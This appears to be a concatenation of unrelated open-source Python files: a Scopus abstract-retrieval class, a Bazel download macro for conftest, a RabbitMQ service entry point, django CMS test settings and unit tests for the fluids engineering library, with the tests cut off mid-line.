surname=entry.get('ce:surname'), given_name=entry.get('ce:given-name'), initials=entry.get('ce:initials')) out.append(new) return out or None @property def correspondence(self): """namedtuple representing the author to whom correspondence should be addressed, in the form (surname, initials, organization, country, city_group). Multiple organziations are joined on semicolon. """ fields = 'surname initials organization country city_group' auth = namedtuple('Correspondence', fields) corr = self._head.get('correspondence') if corr is None: return None aff = corr.get('affiliation', {}) try: org = aff['organization'] try: org = org['$'] except TypeError: # Multiple names given org = "; ".join([d['$'] for d in org]) except KeyError: org = None return auth(surname=corr.get('person', {}).get('ce:surname'), initials=corr.get('person', {}).get('ce:initials'), organization=org, country=aff.get('country'), city_group=aff.get('city-group')) @property def coverDate(self): """The date of the cover the document is in.""" return chained_get(self._json, ['coredata', 'prism:coverDate']) @property def description(self): """Return the description of a record. Note: If this is empty, try property abstract instead. """ return chained_get(self._json, ['coredata', 'dc:description']) @property def doi(self): """DOI of the document.""" return chained_get(self._json, ['coredata', 'prism:doi']) @property def eid(self): """EID of the document.""" return chained_get(self._json, ['coredata', 'eid']) @property def endingPage(self): """Ending page. If this is empty, try .pageRange instead.""" # Try coredata first, fall back to head afterwards ending = chained_get(self._json, ['coredata', 'prism:endingPage']) if not ending: path = ['source', 'volisspag', 'pagerange', '@last'] ending = chained_get(self._head, path) return ending @property def funding(self): """List of namedtuples parsed funding information in the form (agency string id acronym country). """ path = ['item', 'xocs:meta', 'xocs:funding-list', 'xocs:funding'] funds = listify(chained_get(self._json, path, [])) out = [] fund = namedtuple('Funding', 'agency string id acronym country') for item in funds: new = fund(agency=item.get('xocs:funding-agency'), string=item.get('xocs:funding-agency-matched-string'), id=item.get('xocs:funding-agency-id'), acronym=item.get('xocs:funding-agency-acronym'), country=item.get('xocs:funding-agency-country')) out.append(new) return out or None @property def funding_text(self): """The raw text from which Scopus derives funding information.""" path = ['item', 'xocs:meta', 'xocs:funding-list', 'xocs:funding-text'] return chained_get(self._json, path) @property def isbn(self): """ISBNs belonging to publicationName as tuple of variying length, (e.g. ISBN-10 or ISBN-13).""" isbns = listify(chained_get(self._head, ['source', 'isbn'], [])) if len(isbns) == 0: return None else: return tuple((i['$'] for i in isbns)) @property def issn(self): """ISSN belonging to the publicationName. Note: If E-ISSN is known to Scopus, this returns both ISSN and E-ISSN in random order separated by blank space. """ return chained_get(self._json, ['coredata', 'prism:issn']) @property def identifier(self): """ID of the document (same as EID without "2-s2.0-").""" return get_id(self._json) @property def idxterms(self): """List of index terms (these are just one category of those Scopus provides in the web version) .""" try: terms = listify(self._json.get("idxterms", {}).get('mainterm', [])) except AttributeError: # idxterms is empty return None try: return [d['$'] for d in terms] or None except AttributeError: return None @property def issueIdentifier(self): """Number of the issue the document was published in.""" return chained_get(self._json, ['coredata', 'prism:issueIdentifier']) @property def issuetitle(self): """Title of the issue the document was published in.""" return chained_get(self._head, ['source', 'issuetitle']) @property def language(self): """Language of the article.""" return chained_get(self._json, ['language', '@xml:lang']) @property def openaccess(self): """The openaccess status encoded in single digits.""" return chained_get(self._json, ['coredata', 'openaccess']) @property def openaccessFlag(self): """Whether the document is available via open access or not.""" flag = chained_get(self._json, ['coredata', 'openaccessFlag']) if flag: flag = flag == "true" return flag @property def pageRange(self): """Page range. If this is empty, try .startingPage and .endingPage instead. """ # Try data from coredata first, fall back to head afterwards pages = chained_get(self._json, ['coredata', 'prism:pageRange']) if not pages: return chained_get(self._head, ['source', 'volisspag', 'pages']) return pages @property def pii(self): """The PII (Publisher Item Identifier) of the document.""" return chained_get(self._json, ['coredata', 'pii']) @property def publicationName(self): """Name of source the document is published in.""" return chained_get(self._json, ['coredata', 'prism:publicationName']) @property def publisher(self): """Name of the publisher of the document. Note: Information provided in the FULL view of the article might be more complete. """ # Return information from FULL view, fall back to other views full = chained_get(self._head, ['source', 'publisher', 'publishername']) if full is None: return chained_get(self._json, ['coredata', 'dc:publisher']) else: return full @property def publisheraddress(self): """Name of the publisher of the document.""" return chained_get(self._head, ['source', 'publisher', 'publisheraddress']) @property def pubmed_id(self): """The PubMed ID of the document.""" return chained_get(self._json, ['coredata', 'pubmed-id']) @property def refcount(self): """Number of references of an article. Note: Requires either the FULL view or REF view. """ try: # REF view return self._ref['@total-references'] except KeyError: # FULL view return self._ref.get('@refcount') @property def references(self): """List of namedtuples representing references listed in the document, in the form (position, id, doi, title, authors, authors_auid, authors_affiliationid, sourcetitle, publicationyear, volume, issue, first, last, citedbycount, type, text, fulltext). `position` is the number at which the reference appears in the document, `id` is the Scopus ID of the referenced document (EID without the "2-s2.0-"), `authors` is a string of the names of the authors in the format "Surname1, Initials1; Surname2, Initials2", `authors_auid` is a string of the author IDs joined on "; ", `authors_affiliationid` is a string of the authors' affiliation IDs joined on "; ", `sourcetitle` is the name of the source (e.g. the journal), `publicationyear` is the year of the publication as a string, `volume` and `issue`, are strings referring to the volume and issue, `first` and `last` refer to the page range, `citedbycount` is a string for the total number of citations of the cited item, `type` describes the parsing status of the reference (resolved or not), `text` is Scopus-provided information on the publication, `fulltext` is the text the authors used for the reference. Note: Requires either the FULL view or REF view. Might be empty even if refcount is positive. Specific fields can be empty. Author lists (authors, authors_auid, authors_affiliationid) may contain duplicates but None's have been filtered out. """ out = [] fields = 'position id doi title authors authors_auid '\ 'authors_affiliationid sourcetitle publicationyear volume '\ 'issue first last citedbycount type text fulltext' ref = namedtuple('Reference', fields) items = listify(self._ref.get("reference", [])) for item in items: info = item.get('ref-info', item) volisspag = info.get('volisspag', {}) or {} if isinstance(volisspag, list): volisspag = volisspag[0] volis = volisspag.get("voliss", {}) if isinstance(volis, list): volis = volis[0] # Parse author information try: # FULL view parsing auth = listify(item['ref-info']['ref-authors']['author']) authors = [', '.join([d['ce:surname'], d['ce:initials']]) for d in auth] auids = None affids = None ids = listify(info['refd-itemidlist']['itemid']) doi = _select_by_idtype(ids, id_type='DOI') scopus_id = _select_by_idtype(ids, id_type='SGR') except KeyError: # REF view parsing auth = (info.get('author-list') or {}).get('author', []) authors = [', '.join(filter(None, [d.get('ce:surname'), d.get('ce:given-name')])) for d in auth] auids = "; ".join(filter(None, [d.get('@auid') for d in auth])) affs = filter(None, [d.get('affiliation') for d in auth]) affids = "; ".join([aff.get('@id') for aff in affs]) doi = info.get('ce:doi') scopus_id = info.get('scopus-id') # Combine information new = ref(position=item.get('@id'), id=scopus_id, doi=doi, authors="; ".join(authors), authors_auid=auids or None, authors_affiliationid=affids or None, title=info.get('ref-title', {}).get('ref-titletext', info.get('title')), sourcetitle=info.get('ref-sourcetitle', info.get('sourcetitle')), publicationyear=info.get('ref-publicationyear', {}).get('@first'), volume=volis.get('@volume'), issue=volis.get('@issue'), first=volisspag.get('pagerange', {}).get('@first'), last=volisspag.get('pagerange', {}).get('@last'), citedbycount=info.get('citedby-count'), type=info.get('type'), text=info.get('ref-text'), fulltext=item.get('ref-fulltext')) out.append(new) return out or None @property def scopus_link(self): """URL to the document page on Scopus.""" return get_link(self._json, 1) @property def self_link(self): """URL to Scopus API page of this document.""" return get_link(self._json, 0) @property def sequencebank(self): """List of namedtuples representing biological entities defined or mentioned in the text, in the form (name, sequence_number, type). """ path = ['enhancement', 'sequencebanks', 'sequencebank'] items = listify(chained_get(self._head, path, [])) bank = namedtuple('Sequencebank', 'name sequence_number type') out = [] for item in items: numbers = listify(item['sequence-number']) for number in numbers: new = bank(name=item['@name'], sequence_number=number['$'], type=number['@type']) out.append(new) return out or None @property def source_id(self): """Scopus source ID of the document.""" return chained_get(self._json, ['coredata', 'source-id']) @property def sourcetitle_abbreviation(self): """Abbreviation of the source the document is published in. Note: Requires the FULL view of the article. """ return self._head.get('source', {}).get('sourcetitle-abbrev') @property def srctype(self): """Aggregation type of source the document is published in (short version of aggregationType). """ return chained_get(self._json, ['coredata', 'srctype']) @property def startingPage(self): """Starting page. If this is empty, try .pageRange instead.""" # Try coredata first, fall back to bibrecord afterwards starting = chained_get(self._json, ['coredata', 'prism:startingPage']) if not starting: path = ['source', 'volisspag', 'pagerange', '@first'] starting = chained_get(self._head, path) return starting @property def subject_areas(self): """List of namedtuples containing subject areas of the article in the form (area abbreviation code). Note: Requires the FULL view of the article. """ area = namedtuple('Area', 'area abbreviation code') path = ['subject-areas', 'subject-area'] out = [area(area=item['$'], abbreviation=item['@abbrev'], code=item['@code']) for item in listify(chained_get(self._json, path, []))] return out or None @property def subtype(self): """Type of the document. Refer to the Scopus Content Coverage Guide for a list of possible values. Short version of subtypedescription. """ return chained_get(self._json, ['coredata', 'subtype']) or None @property def subtypedescription(self): """Type of the document. Refer to the Scopus Content Coverage Guide for a list of possible values. Long version of subtype. """ return chained_get(self._json, ['coredata', 'subtypeDescription']) or None @property def title(self): """Title of the document.""" return chained_get(self._json, ['coredata', 'dc:title']) @property def url(self): """URL to the API view of the document.""" return chained_get(self._json, ['coredata', 'prism:url']) @property def volume(self): """Volume for the document.""" return chained_get(self._json, ['coredata', 'prism:volume']) @property def website(self): """Website of publisher.""" path = ['source', 'website', 'ce:e-address', '$'] return chained_get(self._head, path) def __init__(self, identifier=None, refresh=False, view='META_ABS', id_type=None): """Interaction with the Abstract Retrieval API. Parameters ---------- identifier : str or int The identifier of a document. Can be the Scopus EID, the Scopus ID, the PII, the Pubmed-ID or the DOI. refresh : bool or int (optional, default=False) Whether to refresh the cached file if it exists or not. If int is passed, cached file will be refreshed if the number of days since last modification exceeds that value. id_type: str (optional, default=None) The type of used ID. Allowed values: None, 'eid', 'pii', 'scopus_id', 'pubmed_id', 'doi'. If the value is None, the function tries to infer the ID type itself. view : str (optional, default=META_ABS) The view of the file that should be downloaded. Allowed values: META, META_ABS, REF, FULL, where FULL includes all information of META_ABS view and META_ABS includes all information of the META view. For details see https://dev.elsevier.com/guides/AbstractRetrievalViews.htm. Raises ------ ValueError If the id_type parameter or the view parameter contains invalid entries. Examples -------- See https://pybliometrics.readthedocs.io/en/stable/examples/AbstractRetrieval.html. Notes ----- The directory for cached results is `{path}/{view}/{identifier}`, where `path` is specified in `~/.scopus/config.ini`. In case `identifier` is a DOI,, an underscore replaces the forward slash. """ # Checks identifier = str(identifier) allowed_views = ('META', 'META_ABS', 'REF', 'FULL') if view not in allowed_views: raise ValueError('view parameter must be one of ' + ', '.join(allowed_views)) if id_type is None: id_type = detect_id_type(identifier) else: allowed_id_types = ('eid', 'pii', 'scopus_id', 'pubmed_id', 'doi') if id_type not in allowed_id_types: raise ValueError('id_type parameter must be one of ' + ', '.join(allowed_id_types)) # Load json Retrieval.__init__(self, identifier=identifier, id_type=id_type, api='AbstractRetrieval', refresh=refresh, view=view) self._json = self._json['abstracts-retrieval-response'] self._head = chained_get(self._json, ["item", "bibrecord", "head"], {}) conf_path = ['source', 'additional-srcinfo', 'conferenceinfo', 'confevent'] self._confevent = chained_get(self._head, conf_path, {}) if self._view == "REF": ref_path = ["references"] else: ref_path = ['item', 'bibrecord', 'tail', 'bibliography'] self._ref = chained_get(self._json, ref_path, {}) def __str__(self): """Return pretty text version of the document. Assumes the document is a journal article and was loaded with view="META_ABS" or view="FULL". """ date = self.get_cache_file_mdate().split()[0] # Authors if self.authors: if len(self.authors) > 1: authors = _list_authors(self.authors) else: a = self.authors[0] authors = str(a.given_name) + ' ' + str(a.surname) else: authors = "(No author found)" # All other information s = f'{authors}: "{self.title}", {self.publicationName}, {self.volume}' if self.issueIdentifier: s += f'({self.issueIdentifier})' s += ', ' s += _parse_pages(self) s += f'({self.coverDate[:4]}).' if self.doi: s += f' https://doi.org/{self.doi}.\n' s += f'{self.citedby_count} citation(s) as of {date}' if self.affiliation: s += "\n Affiliation(s):\n " s += '\n '.join([aff.name for aff in self.affiliation]) return s def get_bibtex(self): """Bibliographic entry in BibTeX format. Raises ------ ValueError If the item's aggregationType is not Journal. """ if self.aggregationType != 'Journal': raise ValueError('Only Journal articles supported.') # Item key year = self.coverDate[0:4] first = self.title.split()[0].title() last = self.title.split()[-1].title() key = ''.join([self.authors[0].surname, year, first, last]) # Authors authors = ' and '.join([f"{a.given_name} {a.surname}" for a in self.authors]) # Pages if self.pageRange: pages = self.pageRange elif self.startingPage: pages = f'{self.startingPage}-{self.endingPage}' else: pages = '-' # All information bib = "@article{{{key},\n author = {{{auth}}},\n title = "\ "{{{{{title}}}}},\n journal = {{{jour}}},\n year = "\ "{{{year}}},\n volume = {{{vol}}},\n number = {{{number}}},"\ "\n pages = {{{pages}}}".format( key=key, auth=authors, title=self.title, year=year, jour=self.publicationName, vol=self.volume, number=self.issueIdentifier, pages=pages) # DOI if self.doi: bib += ",\n doi = {{{}}}".format(self.doi) bib += "}" return bib def get_html(self): """Bibliographic entry in html format.""" # Author links au_link = ('<a href="https://www.scopus.com/authid/detail.url' '?origin=AuthorProfile&authorId={0}">{1}</a>') if len(self.authors) > 1: authors = u', '.join([au_link.format(a.auid, a.given_name + ' ' + a.surname) for a in self.authors[0:-1]]) authors += (u' and ' + au_link.format(self.authors[-1].auid, (str(self.authors[-1].given_name) + ' ' + str(self.authors[-1].surname)))) else: a = self.authors[0] authors = au_link.format(a.auid, a.given_name + ' ' + a.surname) title = u'<a href="{}">{}</a>'.format(self.scopus_link, self.title) if self.volume and self.issueIdentifier: volissue = u'<b>{}({})</b>'.format(self.volume, self.issueIdentifier) elif self.volume: volissue = u'<b>{}</b>'.format(self.volume) else: volissue = 'no volume' jlink = '<a href="https://www.scopus.com/source/sourceInfo.url'\ f'?sourceId={self.source_id}">{self.publicationName}</a>' s = f"{authors}, {title}, {jlink}, {volissue}, " +\ f"{_parse_pages(self, unicode=True)}, ({self.coverDate[:4]})." if self.doi: s += f' <a href="https://doi.org/{self.doi}">doi:{self.doi}</a>.' return s def get_latex(self): """Bibliographic entry in LaTeX format.""" if len(self.authors) > 1: authors = _list_authors(self.authors) else: a = self.authors authors = ' '.join([a.given_name, a.surname]) if self.volume and self.issueIdentifier: volissue = f'\\textbf{{{self.volume}({self.issueIdentifier})}}' elif self.volume: volissue = f'\\textbf{{{self.volume}}}' else: volissue = 'no volume' s = f'{authors}, \\textit{{{self.title}}}, {self.publicationName}, ' +\ f'{volissue}, {_parse_pages(self)} ({self.coverDate[:4]}).' if self.doi: s += f' \\href{{https://doi.org/{self.doi}}}{{doi:{self.doi}}}, ' s += f'\\href{{{self.scopus_link}}}{{scopus:{self.eid}}}.' return s def get_ris(self): """Bibliographic entry in RIS (Research Information System Format) format for journal articles. Raises ------ ValueError If the item's aggregationType is not Journal. """ if self.aggregationType != 'Journal': raise ValueError('Only Journal articles supported.') # Basic information ris = f"TY - JOUR\nTI - {self.title}\nJO - {self.publicationName}"\ f"\nVL - {self.volume}\nDA - {self.coverDate}\n"\ f"PY - {self.coverDate[0:4]}\nSP - {self.pageRange}\n" # Authors for au in self.authors: ris += f'AU - {au.indexed_name}\n' # DOI if self.doi: ris += f'DO - {self.doi}\nUR - https://doi.org/{self.doi}\n' # Issue if self.issueIdentifier: ris += f'IS - {self.issueIdentifier}\n' ris += 'ER - \n\n' return ris def _get_org(aff): """Auxiliary function to extract org information from affiliation for authorgroup. """ try: org = aff['organization'] if not isinstance(org, str): try: org = org['$'] except TypeError: # Multiple names given org = ', '.join([d['$'] for d in org if d]) except KeyError: # Author group w/o affiliation org = None return org def _list_authors(lst): """Format a list of authors (Surname, Firstname and Firstname Surname).""" authors = ', '.join([' '.join([a.given_name, a.surname]) for a in lst[0:-1]]) authors += ' and ' + ' '.join([lst[-1].given_name, lst[-1].surname]) return authors def _parse_pages(self, unicode=False): """Auxiliary function to parse and format page range of a document.""" if self.pageRange: pages = f'pp. {self.pageRange}' elif self.startingPage: pages = f'pp. {self.startingPage}-{self.endingPage}' else: pages = '(no pages found)' if unicode: pages = u'{}'.format(pages) return pages def _select_by_idtype(lst, id_type): """Auxiliary function to return items matching a special idtype.""" try: return [d['$'] for d in lst if d['@idtype'] == id_type][0] except IndexError: return None
nilq/baby-python
python
"""Repository macros for conftest""" load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") load(":platforms.bzl", "OS_ARCH") CONFTEST_VERSION = "0.23.0" _BUILD_FILE_CONTENT = """ exports_files(["conftest"]) """ SHA256S = { "conftest_0.23.0_Darwin_x86_64.tar.gz": "863d2eb3f9074c064e5fc0f81946fb7a04325dd72168468c83a99d139337bafc", "conftest_0.23.0_Linux_x86_64.tar.gz": "60b9c2f2338514b9ec3185051ff29b3aa83c753901810b3a396789c33fd520de", "conftest_0.23.0_Linux_arm64.tar.gz": "852668ffc20bcecbb7ab4862e911b4f35e37d6df1ead89ee1d35901ce03c9e08", "conftest_0.23.0_Windows_x86_64.zip": "d7aef1c7a91800a7212eb87d6d3b83a0b931a7b1dc03a346f220a1fd04f4056d", } def conftest_rules_dependencies(): for os, arch in OS_ARCH: archive_format = "zip" if os == "windows" else "tar.gz" archive_name = "conftest_{v}_{os}_{arch}.{format}".format( v = CONFTEST_VERSION, os = os.capitalize(), arch = arch, format = archive_format, ) http_archive( name = "conftest_{os}_{arch}".format(os = os, arch = arch), sha256 = SHA256S[archive_name], urls = [ "https://github.com/open-policy-agent/conftest/releases/download/v{}/{}".format(CONFTEST_VERSION, archive_name), ], build_file_content = _BUILD_FILE_CONTENT, )
nilq/baby-python
python
from skipper_lib.events.event_receiver import EventReceiver from app.data_service import DataService import os def main(): event_receiver = EventReceiver(username=os.getenv('RABBITMQ_USER', 'skipper'), password=os.getenv('RABBITMQ_PASSWORD', 'welcome1'), host=os.getenv('RABBITMQ_HOST', '127.0.0.1'), port=os.getenv('RABBITMQ_PORT', 5672), queue_name=os.getenv('QUEUE_NAME', 'skipper_data'), service=DataService, service_name=os.getenv('SERVICE_NAME', 'data'), logger=os.getenv('LOGGER_RECEIVER_URL', 'http://127.0.0.1:5001/api/v1/skipper/logger/log_receiver')) if __name__ == "__main__": main()
nilq/baby-python
python
# helpers.py import datetime # import whois import json import socket import time import traceback from random import choice from threading import Thread from urllib.parse import quote as urlencode from urllib.parse import unquote import pytz import requests import socks import subprocess from urllib.error import URLError from pytrends.request import TrendReq LOG_TRACE = True TOTAL_WORLD_CAP_TRILLIONS_USD = 116.78 # Source: https://www.statista.com/statistics/274490/global-value-of-share-holdings-since-2000/ def get_pretty_json_string(value): return json.dumps(value, indent=4, sort_keys=True, ensure_ascii=False) def shell( shell_command_line: str, print_stdout_stderr_bool: bool = True, capture_streams_bool: bool = True, as_text: bool = True, shell_executable_str: str = "bash", command_line_flag_str: str = "-c" ): result = subprocess.run( [shell_executable_str, command_line_flag_str, shell_command_line], stdout = subprocess.PIPE, stderr = subprocess.PIPE #capture_output=capture_streams_bool, text=as_text # py3.7+ ) if print_stdout_stderr_bool: try: print(result.stdout.decode('utf-8')) except KeyboardInterrupt: raise except: traceback.print_exc() try: print(result.stderr.decode('utf-8')) except KeyboardInterrupt: raise except: traceback.print_exc() return result
nilq/baby-python
python
HELPER_SETTINGS = { "TIME_ZONE": "America/Chicago", "INSTALLED_APPS": [ "djangocms_text_ckeditor", "djangocms_versioning", "djangocms_versioning.test_utils.extensions", "djangocms_versioning.test_utils.polls", "djangocms_versioning.test_utils.blogpost", "djangocms_versioning.test_utils.text", "djangocms_versioning.test_utils.people", "djangocms_versioning.test_utils.unversioned_editable_app", ], "MIGRATION_MODULES": { "auth": None, "cms": None, "menus": None, "djangocms_versioning": None, }, "CMS_PERMISSION": True, "LANGUAGES": ( ("en", "English"), ("de", "German"), ("fr", "French"), ("it", "Italiano"), ), "CMS_LANGUAGES": { 1: [ {"code": "en", "name": "English", "fallbacks": ["de", "fr"]}, { "code": "de", "name": "Deutsche", "fallbacks": ["en"], # FOR TESTING DO NOT ADD 'fr' HERE }, { "code": "fr", "name": "Française", "fallbacks": ["en"], # FOR TESTING DO NOT ADD 'de' HERE }, { "code": "it", "name": "Italiano", "fallbacks": ["fr"], # FOR TESTING, LEAVE AS ONLY 'fr' }, ] }, "PARLER_ENABLE_CACHING": False, "LANGUAGE_CODE": "en", } def run(): from djangocms_helper import runner runner.cms("djangocms_versioning", extra_args=[]) if __name__ == "__main__": run()
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- """ script to open directory in current window manager """ import utool as ut if __name__ == '__main__': import sys if len(sys.argv) == 2: path = sys.argv[1] else: path = None ut.assertpath(path) if ut.checkpath(path, verbose=True): ut.view_directory(path) # F:\\data\\work\\PZ_MTEST\\_ibsdb\\
nilq/baby-python
python
# -*- coding: utf-8 -*- '''Chemical Engineering Design Library (ChEDL). Utilities for process modeling. Copyright (C) 2017 Caleb Bell <Caleb.Andrew.Bell@gmail.com> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.''' from __future__ import division import types from fluids.numerics import assert_close, assert_close1d, assert_close2d import pytest import fluids from fluids.units import * from fluids.units import kwargs_to_args def test_kwargs_to_args(): sig = ['rho', 'mu', 'nu'] args = (1,) kwargs = {'mu': 2.2} assert [1, 2.2, None] == kwargs_to_args(args, kwargs, sig) kwargs = {'nu': 2.2} assert [1, None, 2.2] == kwargs_to_args(args, kwargs, sig) assert [12.2, 2.2, 5.5] == kwargs_to_args(tuple(), {'mu': 2.2, 'nu': 5.5, 'rho': 12.2}, sig) assert [None, None, None] == kwargs_to_args(tuple(), {}, sig) assert [12.2, 2.2, 5.5] == kwargs_to_args((12.2, 2.2, 5.5), {}, sig) def assert_pint_allclose(value, magnitude, units, rtol=1e-7, atol=0): assert_close(value.to_base_units().magnitude, magnitude, rtol=rtol, atol=atol) if type(units) != dict: units = dict(units.dimensionality) assert dict(value.dimensionality) == units def assert_pint_allclose1d(value, magnitude, units, rtol=1e-7, atol=0): assert_close1d(value.to_base_units().magnitude, magnitude, rtol=rtol, atol=atol) if type(units) != dict: units = dict(units.dimensionality) assert dict(value.dimensionality) == units def assert_pint_allclose2d(value, magnitude, units, rtol=1e-7, atol=0): assert_close2d(value.to_base_units().magnitude, magnitude, rtol=rtol, atol=atol) if type(units) != dict: units = dict(units.dimensionality) assert dict(value.dimensionality) == units def test_in_right_units(): assert u.default_system == 'mks' def test_nondimensional_reduction(): Re = 171.8865229090909 *u.meter * u.pound / u.centipoise / u.foot ** 2 / u.second eD = 0.0005937067088858105*u.inch/u.meter assert_close(friction_factor(Re, eD).magnitude, 0.012301598061848239) def test_convert_input(): from fluids.units import convert_input ans = convert_input(5, 'm', u, False) assert ans == 5 with pytest.raises(Exception): convert_input(5, 'm', u, True) def test_sample_cases(): Re = Reynolds(V=3.5*u.m/u.s, D=2*u.m, rho=997.1*u.kg/u.m**3, mu=1E-3*u.Pa*u.s) assert_close(Re.to_base_units().magnitude, 6979700.0) assert dict(Re.dimensionality) == {} # vs = hwm93(5E5*u.m, 45*u.degrees, 50*u.degrees, 365*u.day) # vs_known = [-73.00312042236328, 0.1485661268234253] # for v_known, v_calc in zip(vs_known, vs): # assert_close(v_known, v_calc.to_base_units().magnitude) # assert dict(v_calc.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} A = API520_A_g(m=24270*u.kg/u.hour, T=348.*u.K, Z=0.90, MW=51.*u.g/u.mol, k=1.11, P1=670*u.kPa, Kb=1, Kc=1) assert_close(A.to_base_units().magnitude, 0.00369904606468) assert dict(A.dimensionality) == {u'[length]': 2.0} T = T_critical_flow(473*u.K, 1.289) assert_close(T.to_base_units().magnitude, 413.280908694) assert dict(T.dimensionality) == {u'[temperature]': 1.0} T2 = T_critical_flow(473*u.K, 1.289*u.dimensionless) assert T == T2 with pytest.raises(Exception): T_critical_flow(473, 1.289) with pytest.raises(Exception): T_critical_flow(473*u.m, 1.289) # boolean P1 = 8*u.bar + 1*u.atm P2 = 1*u.atm assert True == is_critical_flow(P1, P2, k=1.4*u.dimensionless) A = size_control_valve_g(T=433.*u.K, MW=44.01*u.g/u.mol, mu=1.4665E-4*u.Pa*u.s, gamma=1.30, Z=0.988, P1=680*u.kPa, P2=310*u.kPa, Q=38/36.*u.m**3/u.s, D1=0.08*u.m, D2=0.1*u.m, d=0.05*u.m, FL=0.85, Fd=0.42, xT=0.60) assert_close(A.to_base_units().magnitude, 0.0201629570705307) assert dict(A.dimensionality) == {u'[length]': 3.0, u'[time]': -1.0} A = API520_round_size(A=1E-4*u.m**2) assert_close(A.to_base_units().magnitude, 0.00012645136) assert dict(A.dimensionality) == {u'[length]': 2.0} SS = specific_speed(0.0402*u.m**3/u.s, 100*u.m, 3550*u.rpm) assert_close(SS.to_base_units().magnitude, 2.3570565251512066) assert dict(SS.dimensionality) == {u'[length]': 0.75, u'[time]': -1.5} v = Geldart_Ling(1.*u.kg/u.s, 1.2*u.kg/u.m**3, 0.1*u.m, 2E-5*u.Pa*u.s) assert_close(v.to_base_units().magnitude, 7.467495862402707) assert dict(v.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} s = speed_synchronous(50*u.Hz, poles=12) assert_close(s.to_base_units().magnitude, 157.07963267948966) assert dict(s.dimensionality) == {u'[time]': -1.0} t = t_from_gauge(.2, False, 'AWG') assert_close(t.to_base_units().magnitude, 0.5165) assert dict(t.dimensionality) == {u'[length]': 1.0} dP = Robbins(G=2.03*u.kg/u.m**2/u.s, rhol=1000*u.kg/u.m**3, Fpd=24/u.ft, L=12.2*u.kg/u.m**2/u.s, rhog=1.1853*u.kg/u.m**3, mul=0.001*u.Pa*u.s, H=2*u.m) assert_close(dP.to_base_units().magnitude, 619.662459344 ) assert dict(dP.dimensionality) == {u'[length]': -1.0, u'[mass]': 1.0, u'[time]': -2.0} dP = dP_packed_bed(dp=8E-4*u.m, voidage=0.4, vs=1E-3*u.m/u.s, rho=1E3*u.kg/u.m**3, mu=1E-3*u.Pa*u.s) assert_close(dP.to_base_units().magnitude, 1438.28269588 ) assert dict(dP.dimensionality) == {u'[length]': -1.0, u'[mass]': 1.0, u'[time]': -2.0} dP = dP_packed_bed(dp=8E-4*u.m, voidage=0.4*u.dimensionless, vs=1E-3*u.m/u.s, rho=1E3*u.kg/u.m**3, mu=1E-3*u.Pa*u.s, Dt=0.01*u.m) assert_close(dP.to_base_units().magnitude, 1255.16256625) assert dict(dP.dimensionality) == {u'[length]': -1.0, u'[mass]': 1.0, u'[time]': -2.0} n = C_Chezy_to_n_Manning(26.15*u.m**0.5/u.s, Rh=5*u.m) assert_close(n.to_base_units().magnitude, 0.05000613713238358) assert dict(n.dimensionality) == {u'[length]': -0.3333333333333333, u'[time]': 1.0} Q = Q_weir_rectangular_SIA(0.2*u.m, 0.5*u.m, 1*u.m, 2*u.m) assert_close(Q.to_base_units().magnitude, 1.0408858453811165) assert dict(Q.dimensionality) == {u'[length]': 3.0, u'[time]': -1.0} t = agitator_time_homogeneous(D=36*.0254*u.m, N=56/60.*u.revolutions/u.second, P=957.*u.W, T=1.83*u.m, H=1.83*u.m, mu=0.018*u.Pa*u.s, rho=1020*u.kg/u.m**3, homogeneity=.995) assert_close(t.to_base_units().magnitude, 15.143198226374668) assert dict(t.dimensionality) == {u'[time]': 1.0} K = K_separator_Watkins(0.88*u.dimensionless, 985.4*u.kg/u.m**3, 1.3*u.kg/u.m**3, horizontal=True) assert_close(K.to_base_units().magnitude, 0.07951613600476297, rtol=1e-2) assert dict(K.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} A = current_ideal(V=120*u.V, P=1E4*u.W, PF=1, phase=1) assert_close(A.to_base_units().magnitude, 83.33333333333333) assert dict(A.dimensionality) == {u'[current]': 1.0} fd = friction_factor(Re=1E5, eD=1E-4) assert_close(fd.to_base_units().magnitude, 0.01851386607747165) assert dict(fd.dimensionality) == {} K = Cv_to_K(2.712*u.gallon/u.minute, .015*u.m) assert_close(K.to_base_units().magnitude, 14.719595348352552) assert dict(K.dimensionality) == {} Cv = K_to_Cv(16, .015*u.m) assert_close(Cv.to_base_units().magnitude, 0.0001641116865931214) assert dict(Cv.dimensionality) == {u'[length]': 3.0, u'[time]': -1.0} Cd = drag_sphere(200) assert_close(Cd.to_base_units().magnitude, 0.7682237950389874) assert dict(Cd.dimensionality) == {} V, D = integrate_drag_sphere(D=0.001*u.m, rhop=2200.*u.kg/u.m**3, rho=1.2*u.kg/u.m**3, mu=1.78E-5*u.Pa*u.s, t=0.5*u.s, V=30*u.m/u.s, distance=True) assert_close(V.to_base_units().magnitude, 9.686465044063436) assert dict(V.dimensionality) == {u'[length]': 1.0, u'[time]': -1.0} assert_close(D.to_base_units().magnitude, 7.829454643649386) assert dict(D.dimensionality) == {u'[length]': 1.0} Bo = Bond(1000*u.kg/u.m**3, 1.2*u.kg/u.m**3, .0589*u.N/u.m, 2*u.m) assert_close(Bo.to_base_units().magnitude, 665187.2339558573) assert dict(Bo.dimensionality) == {} head = head_from_P(P=98066.5*u.Pa, rho=1000*u.kg/u.m**3) assert_close(head.to_base_units().magnitude, 10.000000000000002) assert dict(head.dimensionality) == {u'[length]': 1.0} roughness = roughness_Farshad('Cr13, bare', 0.05*u.m) assert_close(roughness.to_base_units().magnitude, 5.3141677781137006e-05) assert 